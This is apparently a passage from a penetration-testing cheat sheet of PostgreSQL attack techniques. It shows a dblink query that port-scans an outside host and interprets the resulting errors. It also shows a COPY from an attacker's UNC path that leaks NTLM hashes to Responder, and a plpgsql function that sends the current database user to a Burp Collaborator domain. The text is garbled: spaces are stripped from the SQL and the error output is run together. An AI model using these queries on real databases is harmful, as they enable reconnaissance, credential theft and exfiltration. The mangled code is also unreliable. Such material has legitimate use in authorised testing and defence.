Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it.Note also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user.
SELECT*FROM dblink_connect('host=216.58.212.238port=443user=namepassword=secretdbname=abcconnect_timeout=10');//Different response// Port closedRROR: could not establish connectionDETAIL: could notconnecttoserver: Connection refusedIs the server running on host "127.0.0.1"and acceptingTCP/IP connections on port 4444?// Port Filtered/TimeoutERROR: could not establish connectionDETAIL: timeout expired// Accessing HTTPserverERROR: could not establish connectionDETAIL: timeout expired// Accessing HTTPS serverERROR: could not establish connectionDETAIL: received invalid response toSSL negotiation:
-- can be used to leak hashes to Responder/equivalentCREATETABLEtest();COPY test FROM E'\\\\attacker-machine\\footestbar.txt';
-- to extract the value of user and send it to Burp CollaboratorCREATETABLEtest(retval text);CREATE OR REPLACEFUNCTIONtestfunc() RETURNS VOID AS $$DECLARE sqlstring TEXT;DECLARE userval TEXT;BEGINSELECTINTO userval (SELECT user);sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';EXECUTE sqlstring;END;$$ LANGUAGE plpgsql SECURITY DEFINER;SELECT testfunc();